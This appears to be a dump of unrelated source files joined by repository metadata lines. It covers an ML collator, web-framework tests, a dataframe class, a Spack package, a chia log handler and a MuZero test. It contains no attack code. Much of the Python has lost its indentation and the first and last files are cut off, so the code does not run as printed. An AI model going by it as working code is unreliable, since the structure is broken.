# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs = tf.where(masked_indices, self.tokenizer.mask_token_id, inputs)
labels = tf.where(masked_indices, labels, -100) # We only compute loss on masked tokens
perm_mask = []
for i in range(len(labels)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
# tf.range is the equivalent of torch.arange
perm_index = tf.range(labels_shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = tf.transpose(tf.reshape(perm_index, (-1, labels_shape[1] // 2)))
# Permute the two halves such that they do not cross over
perm_index = tf.random.shuffle(perm_index) # Shuffles along the first dimension
# Flatten this out into the desired permuted factorisation order
perm_index = tf.reshape(tf.transpose(perm_index), (-1,))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index = tf.where(~masked_indices[i] & non_func_mask[i], -1, perm_index)
            # The logic for whether the i-th token can attend to the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask.append(
(tf.reshape(perm_index, (labels_shape[1], 1)) <= tf.reshape(perm_index, (1, labels_shape[1])))
& masked_indices[i]
)
perm_mask = tf.stack(perm_mask, axis=0)
return tf.cast(inputs, tf.int64), tf.cast(perm_mask, tf.float32), target_mapping, tf.cast(labels, tf.int64)
def numpy_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.shape[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = np.copy(inputs)
# Creating the mask and target_mapping tensors
        masked_indices = np.full(labels.shape, 0, dtype=bool)
target_mapping = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.shape[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = np.eye(labels.shape[1])
special_tokens_mask = np.array(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
            dtype=bool,
)
masked_indices[special_tokens_mask] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0.0
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = np.arange(labels.shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.shape[1] // 2)).T
# Permute the two halves such that they do not cross over
np.random.shuffle(perm_index)
# Flatten this out into the desired permuted factorisation order
perm_index = perm_index.T.flatten()
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index[~masked_indices[i] & non_func_mask[i]] = -1
            # The logic for whether the i-th token can attend to the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.shape[1], 1)) <= perm_index.reshape((1, labels.shape[1]))
) & masked_indices[i]
return inputs.astype(np.int64), perm_mask, target_mapping, labels.astype(np.int64)
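# --- Illustrative sketch (not part of the collator above) ---------------------
# A hedged, minimal example of the two-half permutation and the attention rule
# encoded in `perm_mask`, applied to a toy sequence of length 8 with positions
# 2 and 3 masked and no special/padding tokens. It only assumes that numpy is
# available as `np` in this module (as the code above implies); the helper name
# `_demo_perm_mask` is illustrative and not part of the original API.
def _demo_perm_mask(seq_len=8):
    assert seq_len % 2 == 0, "sequence length must be even (see comments above)"
    masked = np.zeros(seq_len, dtype=bool)
    masked[2:4] = True                       # pretend tokens 2 and 3 were masked
    non_func = np.ones(seq_len, dtype=bool)  # toy case: no [SEP]/[CLS]/padding
    perm_index = np.arange(seq_len)
    perm_index = perm_index.reshape((-1, seq_len // 2)).T  # split into two halves
    np.random.shuffle(perm_index)            # permute halves without crossing over
    perm_index = perm_index.T.flatten()
    perm_index[~masked & non_func] = -1      # non-masked tokens visible to everyone
    # perm_mask[i, j] == 1 means position i cannot attend to position j
    return ((perm_index.reshape((seq_len, 1)) <= perm_index.reshape((1, seq_len)))
            & masked).astype(np.float32)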
|
tests/test_requests.py
|
q0w/BlackSheep
| 420 |
69635
|
<filename>tests/test_requests.py<gh_stars>100-1000
import pytest
from blacksheep import Content, Request, scribe
from blacksheep.contents import FormPart, MultiPartFormData
from blacksheep.exceptions import BadRequestFormat
from blacksheep.messages import get_absolute_url_to_path, get_request_absolute_url
from blacksheep.scribe import write_small_request
from blacksheep.server.asgi import (
get_request_url,
get_request_url_from_scope,
incoming_request,
)
from blacksheep.testing.helpers import get_example_scope
from blacksheep.url import URL
def test_request_supports_dynamic_attributes():
request = Request("GET", b"/", None)
foo = object()
assert (
hasattr(request, "foo") is False
), "This test makes sense if such attribute is not defined"
request.foo = foo # type: ignore
assert request.foo is foo # type: ignore
@pytest.mark.asyncio
@pytest.mark.parametrize(
"url,method,headers,content,expected_result",
[
(
b"https://robertoprevato.github.io",
"GET",
[],
None,
b"GET / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io",
"HEAD",
[],
None,
b"HEAD / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io",
"POST",
[],
None,
b"POST / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io/How-I-created-my-own-media-storage-in-Azure/",
"GET",
[],
None,
b"GET /How-I-created-my-own-media-storage-in-Azure/ HTTP/1.1\r\nhost: robertoprevato.github.io"
b"\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://foo.org/a/b/c/?foo=1&ufo=0",
"GET",
[],
None,
b"GET /a/b/c/?foo=1&ufo=0 HTTP/1.1\r\nhost: foo.org\r\ncontent-length: 0\r\n\r\n",
),
],
)
async def test_request_writing(url, method, headers, content, expected_result):
request = Request(method, url, headers).with_content(content)
data = b""
async for chunk in scribe.write_request(request):
data += chunk
assert data == expected_result
@pytest.mark.parametrize(
"url,query,parsed_query",
[
(b"https://foo.org/a/b/c?hello=world", b"hello=world", {"hello": ["world"]}),
(
b"https://foo.org/a/b/c?hello=world&foo=power",
b"hello=world&foo=power",
{"hello": ["world"], "foo": ["power"]},
),
(
b"https://foo.org/a/b/c?hello=world&foo=power&foo=200",
b"hello=world&foo=power&foo=200",
{"hello": ["world"], "foo": ["power", "200"]},
),
],
)
def test_parse_query(url, query, parsed_query):
request = Request("GET", url, None)
assert request.url.value == url
assert request.url.query == query
assert request.query == parsed_query
@pytest.mark.asyncio
async def test_can_read_json_data_even_without_content_type_header():
request = Request("POST", b"/", None)
request.with_content(Content(b"application/json", b'{"hello":"world","foo":false}'))
json = await request.json()
assert json == {"hello": "world", "foo": False}
@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_json_gives_bad_request_format():
request = Request("POST", b"/", [(b"Content-Type", b"application/json")])
request.with_content(Content(b"application/json", b'{"hello":')) # broken json
with pytest.raises(BadRequestFormat):
await request.json()
@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_non_json_gives_invalid_operation():
request = Request("POST", b"/", [])
request.with_content(
Content(b"application/json", b'{"hello":')
) # broken json; broken content-type
with pytest.raises(BadRequestFormat):
await request.json()
def test_cookie_parsing():
request = Request(
"POST", b"/", [(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;")]
)
assert request.cookies == {
"ai": "something",
"hello": "world",
"foo": "Hello World;",
}
def test_cookie_parsing_multiple_cookie_headers():
request = Request(
"POST",
b"/",
[
(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;"),
(b"Cookie", b"jib=jab; ai=else;"),
],
)
assert request.cookies == {
"ai": "else",
"hello": "world",
"foo": "Hello World;",
"jib": "jab",
}
def test_cookie_parsing_duplicated_cookie_header_value():
request = Request(
"POST",
b"/",
[(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B; hello=kitty;")],
)
assert request.cookies == {
"ai": "something",
"hello": "kitty",
"foo": "Hello World;",
}
@pytest.mark.parametrize(
"header,expected_result",
[
[(b"Expect", b"100-Continue"), True],
[(b"expect", b"100-continue"), True],
[(b"X-Foo", b"foo"), False],
],
)
def test_request_expect_100_continue(header, expected_result):
request = Request("POST", b"/", [header])
assert expected_result == request.expect_100_continue()
@pytest.mark.parametrize(
"headers,expected_result",
[
[[(b"Content-Type", b"application/json")], True],
[[(b"Content-Type", b"application/problem+json")], True],
[[(b"Content-Type", b"application/json; charset=utf-8")], True],
[[], False],
[[(b"Content-Type", b"application/xml")], False],
],
)
def test_request_declares_json(headers, expected_result):
request = Request("GET", b"/", headers)
assert request.declares_json() is expected_result
def test_small_request_headers_add_through_higher_api():
request = Request("GET", b"https://hello-world", None)
request.headers.add(b"Hello", b"World")
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
def test_small_request_headers_add_through_higher_api_many():
request = Request("GET", b"https://hello-world", None)
request.headers.add_many({b"Hello": b"World", b"X-Foo": b"Foo"})
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
assert b"X-Foo: Foo\r\n" in raw_bytes
def test_small_request_headers_add_through_lower_api():
request = Request("GET", b"https://hello-world", None)
request.add_header(b"Hello", b"World")
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
@pytest.mark.parametrize(
"initial_url,new_url",
[
(b"https://hello-world/", b"https://ciao-mondo/"),
(b"https://hello-world/one/two/three", b"https://hello-world/one/two/three/"),
(b"https://hello-world/one/two/three/", b"https://hello-world/one/two/three"),
],
)
def test_request_can_update_url(initial_url, new_url):
request = Request("GET", initial_url, None)
assert request.url.value == initial_url
request.url = URL(new_url)
assert request.url.value == new_url
def test_request_content_type_is_read_from_content():
request = Request("POST", b"/", []).with_content(
MultiPartFormData([FormPart(b"a", b"world"), FormPart(b"b", b"9000")])
)
assert request.content is not None
assert request.content_type() == request.content.type
@pytest.mark.parametrize(
"scope,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"http://127.0.0.1:8000/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"http://127.0.0.1/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"https://127.0.0.1:44777/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"https://127.0.0.1/foo",
),
],
)
def test_get_asgi_request_full_url(scope, expected_value):
request = incoming_request(scope, None)
full_url = get_request_url(request)
assert full_url == expected_value
def test_request_pyi():
request = Request("GET", b"/", [(b"cookie", b"foo=aaa")])
assert request.cookies["foo"] == "aaa"
assert request.get_cookie("foo") == "aaa"
assert request.get_first_header(b"cookie") == b"foo=aaa"
request.set_cookie("lorem", "ipsum")
assert request.get_cookie("lorem") == "ipsum"
@pytest.mark.parametrize(
"scope,trailing_slash,expected_value",
[
[
{"scheme": "https", "path": "/", "server": ("www.neoteroi.dev", 443)},
False,
"https://www.neoteroi.dev/",
],
[
{"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
False,
"https://www.neoteroi.dev/admin",
],
[
{"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
True,
"https://www.neoteroi.dev/admin/",
],
[
{
"scheme": "https",
"path": "/admin",
"server": ("www.neoteroi.dev", 44777),
},
True,
"https://www.neoteroi.dev:44777/admin/",
],
[
{"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 44777)},
True,
"http://www.neoteroi.dev:44777/admin/",
],
[
{"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 80)},
True,
"http://www.neoteroi.dev/admin/",
],
[
{
"scheme": "http",
"path": "/admin",
"server": ("www.neoteroi.dev", 80),
"query_string": b"foo=Hello%20World%20%C3%B8",
},
False,
"http://www.neoteroi.dev/admin?foo=Hello%20World%20%C3%B8",
],
],
)
def test_get_request_url_from_scope(scope, trailing_slash, expected_value):
result = get_request_url_from_scope(scope, trailing_slash=trailing_slash)
assert result == expected_value
def test_get_request_url_from_scope_raises_for_invalid_scope():
with pytest.raises(ValueError):
get_request_url_from_scope({})
@pytest.mark.parametrize(
"scope,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"http://127.0.0.1:8000/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"http://127.0.0.1/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"https://127.0.0.1:44777/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"https://127.0.0.1/foo",
),
],
)
def test_get_request_absolute_url(scope, expected_value):
request = incoming_request(scope)
assert request.scheme == scope["scheme"]
assert request.host == dict(scope["headers"])[b"host"].decode()
assert request.base_path == ""
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == f"{request.scheme}://{request.host}{request.path}"
assert str(absolute_url) == expected_value
@pytest.mark.parametrize(
"scope,base_path,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"/api",
"http://127.0.0.1:8000/api/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"/api/",
"http://127.0.0.1/api/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"/api/oof",
"https://127.0.0.1:44777/api/oof/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"/api/oof/",
"https://127.0.0.1/api/oof/foo",
),
],
)
def test_get_request_absolute_url_with_base_path(scope, base_path, expected_value):
request = incoming_request(scope)
assert request.scheme == scope["scheme"]
assert request.host == dict(scope["headers"])[b"host"].decode()
request.base_path = base_path
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == expected_value
@pytest.mark.parametrize(
"scope,path,expected_result",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"/sign-in",
"http://127.0.0.1:8000/sign-in",
),
(
get_example_scope("GET", "/", scheme="http", server=["127.0.0.1", 8000]),
"/authorization/callback",
"http://127.0.0.1:8000/authorization/callback",
),
(
get_example_scope(
"GET", "/a/b/c/", scheme="http", server=["127.0.0.1", 8000]
),
"/authorization/callback",
"http://127.0.0.1:8000/authorization/callback",
),
],
)
def test_get_request_absolute_url_to_path(scope, path, expected_result):
request = incoming_request(scope)
url_to = get_absolute_url_to_path(request, path)
assert str(url_to) == expected_result
def test_can_set_request_host_and_scheme():
scope = get_example_scope(
"GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
)
request = incoming_request(scope)
request.scheme = "https"
request.host = "neoteroi.dev"
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == "https://neoteroi.dev/blacksheep/"
def test_can_set_request_client_ip():
scope = get_example_scope(
"GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
)
request = incoming_request(scope)
assert request.client_ip == scope["client"][0]
assert request.original_client_ip == "127.0.0.1"
# can set (e.g. when handling forwarded headers)
request.original_client_ip = "192.168.127.12"
assert request.original_client_ip == "192.168.127.12"
assert scope["client"] == ("127.0.0.1", 51492)
|
subjects/hello/hello.py
|
powerdev0510/pythonc
| 405 |
69689
|
<filename>subjects/hello/hello.py
# Some code below
def hello():
print "Hello World"
|
towhee/dataframe/dataframe_v2.py
|
L-Net-1992/towhee
| 365 |
69700
|
<filename>towhee/dataframe/dataframe_v2.py
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from typing import Iterable, List, Tuple, Any
from towhee.dataframe.array import Array
class DataFrame:
"""
A `DataFrame` is a collection of immutable, potentially heterogeneous blobs of data.
Args:
name (`str`):
Name of the dataframe; `DataFrame` names should be the same as its
representation.
data (`list[towhee.Array]` or `list[Tuple]` or `dict[str, towhee.Array]`):
The data of the `DataFrame`. Internally, the data will be organized
in a column-based manner.
"""
def __init__(
self,
name: str = None,
data=None,
columns=None,
):
self._name = name
self._len = 0
self._sealed = False
self._lock = threading.Lock()
# For `data` is empty
if not data:
pass
# For `data` is `list`
elif isinstance(data, list):
container_types = set(type(i) for i in data)
if len(container_types) != 1:
raise ValueError(
'can not construct DataFrame from a list of hybrid data containers. Try list[Tuple] or list[Array].')
container_type = container_types.pop()
# For `data` is `list[tuple]`
if container_type is tuple:
self._from_tuples(data, columns)
# For `data` is `list[towhee.Array]`
elif container_type is Array:
self._from_arrays(data, columns)
else:
raise ValueError('can not construct DataFrame from list[%s]' % (container_type))
# For `data` is `dict`
elif isinstance(data, dict):
self._from_dict(data)
# Unrecognized data types
else:
raise ValueError('can not construct DataFrame from data type %s' % (type(data)))
def __getitem__(self, key):
# access a row
if isinstance(key, int):
return tuple(self._data_as_list[i][key] for i in range(len(self._data_as_list)))
# access a column
elif isinstance(key, str):
return self._data_as_dict[key]
def __len__(self):
return self._len
@property
def name(self) -> str:
return self._name
@property
def data(self) -> List[Array]:
return self._data_as_list
def iter(self) -> Iterable[Tuple[Any, ...]]:
"""
Iterate over DataFrame rows as tuples.
"""
return DFIterator(self)
def seal(self):
with self._lock:
self._sealed = True
def is_sealed(self) -> bool:
with self._lock:
return self._sealed
def _from_tuples(self, data, columns):
# check tuple length
tuple_lengths = set(len(i) for i in data)
if len(tuple_lengths) == 1:
tuple_length = tuple_lengths.pop()
else:
raise ValueError('can not construct DataFrame from unequal-length tuples')
# check columns length
if columns and len(columns) != tuple_length:
raise ValueError('length of columns is not equal to the length of tuple')
# create arrays
if columns:
self._data_as_list = [Array(name=columns[i]) for i in range(tuple_length)]
self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(tuple_length)}
else:
self._data_as_list = [Array() for _ in range(tuple_length)]  # one distinct Array per column; [Array()] * n would alias a single Array
self._data_as_dict = None
# tuples to arrays
for row in data:
for i, element in enumerate(row):
self._data_as_list[i].put(element)
self._len = len(data)
def _from_arrays(self, data, columns):
# check array length
array_lengths = set(len(array) for array in data)
if len(array_lengths) != 1:
raise ValueError('arrays in data should have equal length')
self._len = array_lengths.pop()
# check columns length
if columns and len(columns) != len(data):
raise ValueError('length of columns is not equal to the number of arrays')
self._data_as_list = data
if columns:
self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(len(data))}
else:
self._data_as_dict = None
def _from_dict(self, data):
# check dict values
for value in data.values():
if not isinstance(value, Array):
raise ValueError('value type in data should be towhee.Array')
# check arrays length
array_lengths = set(len(array) for array in data.values())
if len(array_lengths) != 1:
raise ValueError('arrays in data should have equal length')
self._len = array_lengths.pop()
self._data_as_list = list(data.values())
self._data_as_dict = data
class DFIterator:
"""
A row-based `DataFrame` iterator.
"""
def __init__(self, df: DataFrame):
self._df = df
self._offset = 0
def __iter__(self):
return self
def __next__(self):
"""
Returns:
(`Tuple[Any, ...]`)
In the normal case, the iterator will return a `Tuple` at each call.
(`None`)
In the case that the `DataFrame` is not sealed and the new rows are
not ready yet, the iterator will return `None`. The caller should
determine whether to block the iteration or exit the loop.
Raises:
(`StopIteration`)
The iteration ends only when the `DataFrame` is sealed and the last
row has been reached.
"""
if len(self._df) == self._offset:
if self._df.is_sealed():
# Already reached the last row
raise StopIteration
else:
# No more ready rows
return None
else:
row = self._df[self._offset]
self._offset += 1
return row
def ack(self):
"""
Notify the `DataFrame` that the iterated rows have been successfully processed.
An acknowledgement (ack) tells the `DataFrame` that the rows already iterated
over are no longer needed and can be deleted from the system.
"""
pass
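# --- Illustrative usage sketch (guarded so it does not run on import) ----------
# A hedged example of the constructor and iterator documented above, building a
# DataFrame from a list of tuples. The column names and values are made up, and
# it assumes towhee.Array supports the put()/indexing used by DataFrame above.
if __name__ == '__main__':
    df = DataFrame(name='demo', data=[(1, 'a'), (2, 'b'), (3, 'c')], columns=['id', 'label'])
    df.seal()                     # sealed, so iteration ends with StopIteration
    for row in df.iter():
        print(row)                # e.g. (1, 'a')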
|
rpython/jit/backend/aarch64/test/test_list.py
|
nanjekyejoannah/pypy
| 333 |
69704
|
<reponame>nanjekyejoannah/pypy
from rpython.jit.metainterp.test.test_list import ListTests
from rpython.jit.backend.aarch64.test.test_basic import JitAarch64Mixin
class TestList(JitAarch64Mixin, ListTests):
# for individual tests see
# ====> ../../../metainterp/test/test_list.py
pass
|
var/spack/repos/builtin/packages/pacparser/package.py
|
LiamBindle/spack
| 2,360 |
69716
|
<gh_stars>1000+
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Pacparser(MakefilePackage):
"""pacparser is a library to parse proxy auto-config (PAC) files."""
homepage = "https://pacparser.github.io/"
url = "https://github.com/manugarg/pacparser/releases/download/1.3.7/pacparser-1.3.7.tar.gz"
version('1.3.7', sha256='eb48ec2fc202d12a4b882133048c7590329849f32c2285bc4dbe418f29aad249')
depends_on('python', when='+python')
depends_on('py-setuptools', when='+python', type=('build', 'run'))
variant('python', default=False,
description='Build and install python bindings')
def build(self, spec, prefix):
make('-C', 'src')
if '+python' in spec:
make('-C', 'src', 'pymod')
def install(self, spec, prefix):
make('-C', 'src', 'install', 'PREFIX=' + self.prefix)
if '+python' in spec:
make('-C', 'src', 'install-pymod', 'PREFIX=' + self.prefix,
'EXTRA_ARGS=--prefix={0}'.format(prefix))
|
recipes/Python/252178_Reorder_sequence_uses_generators/recipe-252178.py
|
tdiprima/code
| 2,023 |
69733
|
<reponame>tdiprima/code<gh_stars>1000+
def all_perms(seq):
    if len(seq) <= 1:
        yield seq
    else:
        for perm in all_perms(seq[1:]):
            for i in range(len(perm) + 1):
                # nb seq[0:1] works in both string and list contexts
                yield perm[:i] + seq[0:1] + perm[i:]
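# --- Illustrative usage (hedged) ------------------------------------------------
# Permutations are yielded lazily, so wrap the generator in list() to materialise
# them; as the comment above notes, both strings and lists work.
if __name__ == '__main__':
    print(list(all_perms('abc')))    # ['abc', 'bac', 'bca', 'acb', 'cab', 'cba']
    print(list(all_perms([1, 2])))   # [[1, 2], [2, 1]]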
|
src/chia_log/log_handler.py
|
Connor-Knabe/chiadog
| 503 |
69749
|
<gh_stars>100-1000
# std
from typing import Optional
# project
from src.chia_log.handlers.daily_stats.stats_manager import StatsManager
from src.chia_log.handlers.harvester_activity_handler import HarvesterActivityHandler
from src.chia_log.handlers.partial_handler import PartialHandler
from src.chia_log.handlers.block_handler import BlockHandler
from src.chia_log.handlers.finished_signage_point_handler import FinishedSignagePointHandler
from src.chia_log.handlers.wallet_added_coin_handler import WalletAddedCoinHandler
from src.chia_log.log_consumer import LogConsumerSubscriber, LogConsumer
from src.notifier.notify_manager import NotifyManager
class LogHandler(LogConsumerSubscriber):
"""This class holds a list of handlers that analyze
specific parts of the logs and generate events that
are consumed by the notifier (for user notifications).
Data flow:
LogConsumer -> LogHandler -> Notifier
Three easy steps to extend monitoring functionality
1. Create a parser for a new part of the log stream
2. Create a handler for analysing the parsed information
3. Add the new handler to the list of handlers below
"""
def __init__(
self, log_consumer: LogConsumer, notify_manager: NotifyManager, stats_manager: Optional[StatsManager] = None
):
self._notify_manager = notify_manager
self._stats_manager = stats_manager
self._handlers = [
HarvesterActivityHandler(),
PartialHandler(),
BlockHandler(),
FinishedSignagePointHandler(),
WalletAddedCoinHandler(),
]
log_consumer.subscribe(self)
def consume_logs(self, logs: str):
for handler in self._handlers:
events = handler.handle(logs, self._stats_manager)
self._notify_manager.process_events(events)
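# --- Illustrative sketch (not part of chiadog) ----------------------------------
# A hedged example of steps 2-3 from the docstring above: a hypothetical handler
# that follows the interface used in consume_logs(), i.e. handle(logs, stats_manager)
# returning a list of events. The class name and behaviour are made up; to wire it
# in, an instance would be appended to the handler list in LogHandler.__init__.
class ExampleNoopHandler:
    def handle(self, logs: str, stats_manager: Optional[StatsManager] = None) -> list:
        # A real handler would parse `logs` and return events for the notifier.
        return []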
|
muzero/core_test.py
|
xxdreck/google-research
| 23,901 |
69766
|
<reponame>xxdreck/google-research<filename>muzero/core_test.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for muzero.core."""
import tensorflow as tf
from muzero import core
class CoreTest(tf.test.TestCase):
def test_make_target(self):
num_unroll_steps = 3
td_steps = -1
rewards = [1., 2., 3., 4.]
# Assume 4 different actions.
policy_distributions = [
[0.7, 0.1, 0.1, 0.1],
[0.1, 0.7, 0.1, 0.1],
[0.1, 0.1, 0.7, 0.1],
[0.1, 0.1, 0.1, 0.7],
]
discount = 0.9
target = core.Episode.make_target(
state_index=0,
num_unroll_steps=num_unroll_steps,
td_steps=td_steps,
rewards=rewards,
policy_distributions=policy_distributions,
discount=discount)
self.assertEqual(core.Target(
value_mask=(1., 1., 1., 1.),
reward_mask=(0., 1., 1., 1.),
policy_mask=(1., 1., 1., 1.),
value=(rewards[0] + rewards[1] * discount \
+ rewards[2] * discount**2 + rewards[3] * discount**3,
rewards[1] + rewards[2] * discount + rewards[3] * discount**2,
rewards[2] + rewards[3] * discount,
rewards[3]),
reward=(rewards[3], rewards[0], rewards[1], rewards[2]),
visits=tuple(policy_distributions)), target)
target = core.Episode.make_target(
state_index=2,
num_unroll_steps=num_unroll_steps,
td_steps=td_steps,
rewards=rewards,
policy_distributions=policy_distributions,
discount=discount)
self.assertEqual(
core.Target(
value_mask=(1., 1., 1., 1.),
reward_mask=(0., 1., 1., 0.),
policy_mask=(1., 1., 0., 0.),
value=(rewards[2] + rewards[3] * discount, rewards[3], 0., 0.),
reward=(rewards[1], rewards[2], rewards[3], 0.),
visits=tuple(policy_distributions[2:] +
[policy_distributions[0]] * 2)), target)
def test_encode_decode(self):
encoder = core.ValueEncoder(
min_value=-2,
max_value=2,
num_steps=5,
use_contractive_mapping=False)
encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
self.assertAllClose([[0, 0.5, 0.5, 0, 0],
[0, 0, 0.1, 0.9, 0],
[0, 0, 0, 0, 1]], encoded)
self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded))
encoder = core.ValueEncoder(
min_value=-2,
max_value=2,
num_steps=5,
use_contractive_mapping=True)
encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
# Scaling transformation with contractive mapping
